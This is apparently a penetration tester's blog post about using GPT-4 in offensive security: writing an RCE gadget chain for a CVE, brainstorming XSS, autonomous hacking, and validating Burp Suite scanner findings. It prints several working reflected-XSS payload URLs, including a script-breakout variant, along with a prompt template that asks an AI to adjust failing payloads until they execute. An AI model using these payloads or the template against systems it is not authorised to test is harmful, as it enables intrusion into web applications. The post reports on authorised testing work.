Ever since the day I had GPT-4 write a widget-chain for an old 0-day in five minutes that originally took me two or three work days to create (CVE-2021-42777) , I've been humbled by the power of using an AI automation that "understands" the context of various offensive security situations. This is probably going to sound like hype, so we're going to stick to practical examples that have actually resulted in exploits. AI is just another tool in the hacker tool box. As always, we as ethical hackers strive to mimic criminals by aiming for low-effort high-impact, and that certainly includes the use of AI (and specifically generative AI for its contextual abilities). By "context", I mean a few different situations, so I'll talk about examples for each one:
Payload Technical Requirements Context
For example, in that scenario for CVE-2021-42777, there were plenty of trial-and-error tasks that I did manually that could have been automated (specifically, the requirements allowed by the field, like: "it must not contain curly braces", "it must be one-line of C#", "it must return an object", etc.) However, instead of automating the trial-and-error recon, I chose to give the hardest part to the machine: the mental gymnastics of crafting the command that would fit all of those discovered payload requirements. I assumed it should be able to create a one-liner widget chain that would be useful for remote code execution. Well, I was not disappointed. It created a perfectly viable widget chain that met all of the requirements necessary to own the server in ONE PROMPT (while GPT-3.5 took about 30 prompts).
Traditionally, there was no reference or way to "google" how to do a 0-day like this - it essentially has to be generated or created for the first time. Enter generative AI. Because of this experience as a fairly new prompt engineer myself, I predict a lot of non-coding hackers becoming very good at creating low-level technical 0-days (of all types, not just widget chain RCEs), all because of access to this technology.
Exploit Brainstorming Context
Context is not limited to the reconnaissance phase either. I have used it for other types of research: brainstorming techniques for specialized XSS (i.e. expanding this one to be more generalized for many types of fields and field validation so it could be sprayed across many targets for bug bounties).
Business Logic Context
Inspired by a Dan Miessler podcast, I had GPT find and review the manual for a product that I was trying to exploit. It will give you a list of what you're "not supposed to be able to do" and that becomes your hacking "to do" list!
Decision Making / Autonomous Hacking
The system can pick the next direction on a pen test, of course. I don't mean PentestGPT, which is very manually guided... in the early days of GPT, I built a system for autonomously moving through a system and prompting itself to ask the next question about the next possible hack. There's so many possible ways to hack a system, and it only needs to get one right to add a finding to a report, after all. Knowing this, I didn't mind the hallucinations or false attempts that much (as long as it could test and validate itself). Nowadays, there's likely better ones than the one I've made (in fact, one of the HOPE attendees reached out after my talk to tell me about RunSybil).
Technical Inventory Vulnerabilities Context
How great would it have been if we'd had GPT during the Log4J saga? Imagine just asking your systems "are there systems that have dependencies of dependencies and so on that use a Java logger". Even with manual validation, that would have saved so much research time! Also, speaking of validation...
Burp Suite Scanner Exploit Validation
This is an XSS success story from a web application penetration test I recently completed as part of my consulting work. False positives aren't a new issue with scanners like the Burp Suite audit & crawl... but validating them with GPT certainly is! Here's how it works:
Originally, this XSS payload provided by the Burp Suite audit didn't launch:
https://REDACTED.COM/w/widget-settings-menu?type=panelWidgetSettings20454%3balert(1)%2f%2f663dtm5&panelOpts%5BdialogOpts%5D%5Btitle%5D=Widget+Setting
While trying to fix it so it would execute, I took a look at the code of the source page it was trying to inject and found the problem. After a few changes, I saw the payload wasn't properly escaping the JavaScript:
<html>
<script>
(function() {
var opts67286f10 = {"dialogOpts":{"title":"Widget Setting","width":"900","height":"600"},"controller":"patient","action":"index","openTrigger":"openSettings","pre-name":"widget-settings","headerText":""};
$("#widget-settings-panel").panelWidgetSettings2054;alert(1)//663dtm5(opts2865e6f10);}());
</script> </html>
So, I changed it manually by adding a </script> escape:
https://REDACTED.COM/w/widget-settings-menu?type=%3Ca%20href=%22yo%22%3EsdfSdfsdfsf%3C/a%3E}%3C/scrIpt%3E%3CscriPt%3Ealert(999)%3C/Script%3E&panelOptions[dialogOptions][title]=Widget+Setting
And... success!
But I couldn't help but wonder... I had a LOT more findings like this. Could I automate GPT-4 validating these? Since it's also very good at coding, and, given the correct requirements like in the 0-day story, couldn't it fix the payload if it had the right requirements provided as context?
I made a generalized prompt like this:
you are an excellent cybersecurity researcher.
knowing that the following web app likely has a [VULNERABILITY TYPE] issue, how can this payload be adjusted to exploit it, since the following payload doesn't launch it?
[PAYLOAD HERE]
the html of the web page:
[THE HTML CODE FROM THE PAGE]
In this case, after the GPT API tooling is done filling in the placeholders using information from the BurpSuite audit finding output, the raw prompt would look like this:
you are an excellent cybersecurity researcher.
knowing that the following snippet of the html page likely has a xss issue, how can this url be adjusted to launch the xss, since the following payload doesn't launch?
w/widget-settings-menu?type=panelWidgetSettings204%3balert(1)%2f%2f663dkktm5&panelOptions%5BdialogOptions%5D%5Btitle%5D=Widget+Setting
the snippet of html that contains javascript:
<html>
<script>
(function() {
var opts67286f10 = {"dialogOptions":{"title":"Widget Setting","width":"900","height":"600"},"controller":"patient","action":"index","openTrigger":"openSettings","pre-name":"widget-settings","headerText":""};
$("#widget-settings-panel").panelWidgetSettings2054;alert(1)//663dkktm5(options2865e6f10);}());
</script> </html>
It had great results! Here was the generated payload, and much faster than it would have taken me to do the validation manually:
https://REDACTED.COM/widgets/widget-settings-menu?type=panelWidgetSettings20454%3B%7D%29%3Balert%281%29%3B%28function%28%29%7B&panelOptions[dialogOptions][title]=Widget+Setting
I have written a lot of GPT-powered tools in the last year for both work, consulting, and personal use, and if it's not clear by now: this is not a trend and it's not slowing down. I'm blown away every day by what these systems are able to do, with the right prompt engineering. One day, I bet coding will be a quaint old-fashioned hobby like knitting - some people still do it, but mostly for fun because we have knitting machines to make most sweaters. It makes me hopeful that hackers will get to spend more time on more creative open-ended hacks that are harder to get the AI to do... like using the free trial version of software to get around encryption (like this one), and less time on the eye-bleeding activities that can be widget chains, scanner validation, or fiddling with XSS syntax or worn-in payload lists that all have well-known patches that defend against them (GPT can remix those payloads in a context-dependent way, of course!). But who knows, maybe with the right prompts the machine will do the outside-of-the-box hacks as well!
It looks like there isn't already a GPT-powered scanner validator Burp Suite extension, so, I should probably write one. (Disclaimer: if you are interested in writing tools like this, be aware that this sort of functionality usually requires a private instance of an AI model to help prevent sensitive data leakage, never use public AI chat systems for sensitive work).